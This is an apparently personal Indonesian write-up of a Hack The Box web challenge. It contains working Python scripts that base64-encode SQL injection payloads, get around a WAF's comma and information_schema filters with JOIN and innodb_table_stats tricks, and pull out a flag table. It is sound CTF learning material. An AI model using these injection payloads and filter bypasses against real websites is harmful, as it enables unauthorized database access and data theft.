Diberikan website yang langsung memunculkan error. Error pertama dibilang “obj” tidak ada, jadi sepertinya kita perlu memprovide dengan menggunakan variable “obj”, memasukan obj dengan method get bisa dilihat error pertama hilang.
Untuk error kedua harus ada sedikit bacaan, dibilang terdapat non-object ‘ID’ sepertinya kita perlu memprovide “ID” juga tetapi berbeda dengan “obj”. Membaca sedikit tentang data types saya melihat kita dapat memberikan object value dengan passing json…
reference: https://forum.getkirby.com/t/trying-to-get-property-of-non-object-error/3486
kita bisa melakukan seperti {“ID”:”1234″}, tetapi sepertinya tidak seperti itu passingnya, di dalam inspect terdapat suatu hint.
base64_encode($data), sepertinya kita harus mengubah payloadnya menjadi base64 terlebih dahulu.
Now there is no error, but there is no output either… disini saya mulai stuck, mencoba banyak hal dan akhirnya… saya menemukan sesuatu dengan ‘ (petik satu), dengan mengubah value ID nya menjadi ‘ kita mendapatkan error lagi.
mysqli_fetch_assoc() error. Sepertinya kita harus melakukan SQLI. mencoba-coba akhirnya menemukan sesuatu. (selanjutnya akan dilakukan melalui python dikarenakan… convert ke base64 terus menerus melelahkan .-.).
1 2 3 4 5 6 7 8 9 10 |
#seems like they block , (coma) url = "http://docker.hackthebox.eu:31252/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT 1,2\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() print flag.center.get_text() |
Mencoba-coba saya mendapatkan error saat menggunakan , (coma).
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
mencari dari PayloadsAllTheThings kita bisa memakai bypass coma, dengan menggunakan itu…
1 2 3 4 5 6 7 8 9 10 |
#"2" seems to be printed (bypass coma) url = "http://docker.hackthebox.eu:31252/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() print flag.center.get_text() |
Bisa dilihat outputnya di print untuk bagian ke “2”, first thing first cari tahu nama databasenya.
1 2 3 4 5 6 7 8 9 10 11 12 |
#get database names url = "http://docker.hackthebox.eu:31252/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT schema_name FROM information_schema.schemata)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() outputs = flag.find_all('h4') for output in outputs: print output.get_text() |
terdapat yang mencurigakan database ‘ezpz’, lalu saya ingin mencari nama tabel nya.
1 2 3 4 5 6 7 8 9 10 |
#blocked again by waf but... url = "http://docker.hackthebox.eu:31252/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name FROM information_schema.tables)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() print flag.center.get_text() |
Terlihat kita di blocked lagi, tetapi…
1 2 3 4 5 6 7 8 9 10 |
#this doesn't get blocked... so maybe information_schema.tables is blocked url = "http://docker.hackthebox.eu:31252/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() print flag.center.get_text() |
Dengan tidak menggunakan information_schema.tables kita mendapatkan error mysqli biasa bukan dari WAF. Melihat lagi dari PayloadsAllTheThings terdapat cara untuk bypass information_schema.tables juga.
1 2 3 4 5 6 7 8 9 10 11 12 |
#get table names (bypass information_schema.tables) url = "http://docker.hackthebox.eu:31252/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name FROM mysql.innodb_table_stats)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() outputs = flag.find_all('h4') for output in outputs: print output.get_text() |
Get FlagTableUnguessableEzPZ as table name. Sekarang kita hanya perlu mengeluarkan isinya.
1 2 3 4 5 6 7 8 9 |
#final payload payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT * FROM ezpz.FlagTableUnguessableEzPZ)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() print flag.h4.get_text() |
Flag : HTB{T0oE4syP34syL4m3SQLiF!lt3rs}
forgotten notes :
“bs” di python codenya merupakan “BeautifulSoup” dari library bs4
full journey here:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 |
#!/usr/bin/env python import base64 import requests from bs4 import BeautifulSoup as bs #first testing with object 'ID' url = "http://docker.hackthebox.eu:31252/?obj=" payload = base64.b64encode("{\"ID\":\"1234\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() print flag.center.get_text() #found the holy grace with ' url = "http://docker.hackthebox.eu:31252/?obj=" payload = base64.b64encode("{\"ID\":\"'\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() print flag.center.get_text() #seems like they block , (coma) url = "http://docker.hackthebox.eu:31252/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT 1,2\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() print flag.center.get_text() #"2" seems to be printed (bypass coma) url = "http://docker.hackthebox.eu:31252/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() print flag.center.get_text() #get database names url = "http://docker.hackthebox.eu:31252/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT schema_name FROM information_schema.schemata)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() outputs = flag.find_all('h4') for output in outputs: print output.get_text() #blocked again by waf but... url = "http://docker.hackthebox.eu:31252/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name FROM information_schema.tables)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() print flag.center.get_text() #this doesn't get blocked... so maybe information_schema.tables is blocked url = "http://docker.hackthebox.eu:31252/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() print flag.center.get_text() #get table names (bypass information_schema.tables) url = "http://docker.hackthebox.eu:31252/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name FROM mysql.innodb_table_stats)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() outputs = flag.find_all('h4') for output in outputs: print output.get_text() print "" #final payload payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT * FROM ezpz.FlagTableUnguessableEzPZ)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() print flag.h4.get_text() |